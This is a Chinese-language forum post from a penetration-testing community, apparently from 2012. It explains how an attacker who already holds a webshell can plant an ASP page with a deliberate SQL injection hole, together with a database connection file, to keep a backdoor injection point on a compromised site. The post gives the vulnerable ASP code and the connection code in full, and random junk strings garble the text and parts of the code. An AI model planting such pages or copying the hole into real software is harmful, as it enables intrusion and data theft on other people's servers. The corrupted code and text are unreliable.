中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵  {1 J5 E6 B- q9 o( @; S
- c, o* n3 q, i" M
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息9 k3 V0 R* \3 E
4 |! a# L9 W* J  t. o7 x$ P
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!5 ]" o/ v5 a( i! |' l: n( c+ [  _

7 T  k- i8 R  |& u首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和; g) u# U! G# B: e. q

" V1 H2 L. d( f2 {. U/ z9 p( m1 W密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表/ |! S# D9 E/ z( \
, F. k+ F! f  B% y- ]2 k+ ^( d7 [
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:7 G4 k9 @# Q4 C- E8 p) B$ V0 d
* H% y/ w- d5 N; D* S. z6 a; D
程序代码. u9 A0 ~, q3 m9 v# O: m$ f' ^
<!--#include file="xx.asp"-->
% }1 `6 z& q# R4 Q/ A+ G<%. D1 }6 O0 \2 U& @3 ~& s+ i
set rs=server.createobject("ADODB.recordset")
$ U: ]2 G: s2 O7 K: x- jid = request("id")
& Q8 u7 v1 Q3 }( ~% [. f. @strSQL = "select * from admin where id=" & id& ~( d! k6 r; S! j4 \- ^% n- r
rs.open strSQL,conn,1,3# m7 ]! J) S: a" j
rs.close
" r* U4 _* l9 n. T( j: ]%>
4 K) c$ t& P+ p
3 X& t/ p+ A( W% ^+ f" o% v把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在6 v. @* A. K2 `$ B2 l: `5 {4 n

7 m. z6 @9 b; K" H, O, }1 ]你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!# ^5 C0 h; J2 P& b! R1 M. r

" L* u% x, R8 m5 K- Y然后就要构造一个连接数据库的文件了,代码如下:
0 i: f  a3 j4 d0 `0 n; B程序代码
! q$ v7 f( m! y; b( H<%        
1 ]+ s) W3 C1 C3 O1 a* U: M7 T' K4 dstrSQLServerName = "000.000.000.000"     '服务器名称或地址" R% y! F/ v. J* @4 E/ d
strSQLDBUserName = "sqlname"         '数据库帐号- ]! Q# E5 w) o$ ^
strSQLDBPassword = "sqlpass"         '数据库密码
8 `) d/ j* X, q- O" P/ `; [& k# c8 YstrSQLDBName = "sqldataname"           '数据库名称
7 ^7 F9 `9 B. }- h, A( XSet conn = Server.CreateObject("ADODB.Connection")
5 S& F: B( i/ A- m5 f6 XstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"/ t" m! ]: ~$ M, E# \
conn.open strCon
' R( |& `% w" v+ x, D4 S' L%>' y9 O) F# _8 W1 F

+ X7 t5 V7 d# |这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,3 ~( w( J# W7 ^1 i; W" d

8 y0 @7 ?/ w$ @就这样,正常情况下,就OK了,伪造成功……( }/ C- ^  U/ L  P/ k

  z$ I; p2 K$ y+ L3 C" _# n           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2